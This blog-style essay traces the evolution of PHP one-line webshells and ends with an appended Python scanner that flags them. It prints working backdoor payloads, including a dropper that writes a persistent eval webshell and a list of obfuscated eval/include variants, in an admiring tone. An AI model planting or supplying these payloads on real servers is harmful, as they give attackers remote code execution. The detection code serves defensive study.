Historical proof: Web security, in the narrow sense, has moved from the ASP era into the PHP era. As operating platforms have diversified beyond the Windows family, server security has also spread from Windows to Unix/Linux. Security has a long way to go. No complicated system can be thought through completely by its designers. What's more, a crowd of people stares at it all day, so the wisdom of a small number of designers is always inferior to that of the masses. Even the most careful design leaves a gap somewhere. What we can do now is do a good job at the grass-roots level, work together, and share our collective wisdom to contribute to security.
Security does not have a final solution. It is a dialectical problem: a game in which you attack, I defend, and then I work hard to build better armor. That is a worry. To deploy defenses faster, you must be one step ahead of the attackers!
Why? Read on!
Reading between the lines, one has to admire how hard the hacker racked their brains.
Code:
<?php @$_POST[f]($_POST[w]); exit;?>
w=fwrite(fopen("a.php",a+),"<?php eval($_POST[cmd]);?>");
f=*****
Practice has proved that this works. Alas, trojan detection still has a long way to go.
Status quo: You must become familiar with new languages and understand their security features, so as not to be left behind.
Future: ...... just hope not to be left behind.
Historical review:
Ver 1.0 <?php eval($_POST[w]);?>
Ver 1.1 <?php @eval($_POST[w]);?>
Ver 1.2 <?php eval(@base64_decode($_POST[w]));?>
Ver 2.0 <?php include xxoo.jpg;?>
Ver 2.0.1 <?php require_once xxoo.jpg;?>
Ver 2.0.* <?php ***** xxoo.jpg;?>
Ver 3.0 <?php @$_POST[f]($_POST[w]);?>
Ver 3.0.* <?php $a=@$_POST[f]; $b=$_POST[w]; ......?>
Ver *.* <?php /* UNKNOWN */ ?>
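One way to turn the review above into detection checks that key on behavior (request data reaching eval, an include of a non-PHP file, request data or a variable filled from it used as a function name) instead of on one literal string. This is an added example, not code from the original post; the rule names, the scan function and the sample strings are constructed for illustration, and the Ver 3.0.* sample assumes the elided part ends in a call through $a.

```python
import re

# Superglobals whose contents the HTTP client controls.
SRC = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"

RULES = {
    # Ver 1.x: request data reaches eval(), directly or through a decoder call.
    "eval-of-request-data": re.compile(
        r"\beval\s*\(\s*@?\s*(?:\w+\s*\(\s*)*" + SRC, re.I),
    # Ver 2.x: include/require of a file whose extension is not .php or .inc.
    "include-of-non-php-file": re.compile(
        r"\b(?:include|require)(?:_once)?\b\s*\(?\s*['\"]?[\w./-]+"
        r"\.(?!(?:php|inc)\b)\w+(?![\w./-])", re.I),
    # Ver 3.0: the function name itself is taken from the request.
    "request-data-as-callable": re.compile(SRC + r"\s*\[[^\]]*\]\s*\(", re.I),
}
ASSIGN = re.compile(r"\$(\w+)\s*=\s*@?\s*" + SRC)


def scan(php_source):
    """Return the sorted names of the rules that match one PHP source string."""
    code = re.sub(r"/\*.*?\*/", " ", php_source, flags=re.S)  # drop block comments
    hits = {name for name, rx in RULES.items() if rx.search(code)}
    # Ver 3.0.*: one step of taint tracking. A variable assigned from request
    # data and later called as a function is the same trick split in two.
    for var in ASSIGN.findall(code):
        if re.search(r"\$" + re.escape(var) + r"\s*\(", code):
            hits.add("tainted-variable-as-callable")
    return sorted(hits)


# Constructed samples: the page's variants with normal spacing, plus benign code.
SAMPLES = {
    "ver1.0": "<?php eval($_POST[w]);?>",
    "ver1.1": "<?php @eval($_POST[w]);?>",
    "ver1.2": "<?php eval(@base64_decode($_POST[w]));?>",
    "ver2.0": "<?php include xxoo.jpg;?>",
    "ver2.0.1": "<?php require_once xxoo.jpg;?>",
    "ver3.0": "<?php @$_POST[f]($_POST[w]);?>",
    "ver3.0.x": "<?php $a=@$_POST[f]; $b=$_POST[w]; $a($b);?>",
    "benign": "<?php require_once 'lib/db.inc.php'; echo strlen($_POST['q']);?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name:9} {scan(src) or 'clean'}")
```

Pattern rules like these are a triage heuristic for file scans; the Ver *.* entry in the list is the reminder that unknown variants will fall outside them.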
As with Taiji, where the Eight Trigrams give rise to all things, the idea here is only a hint, and it can be expanded quickly.
Ask what will happen in the future and, in the words of a teacher: God knows!
Taking over a server with a single line of code: that may be the charm of hacking.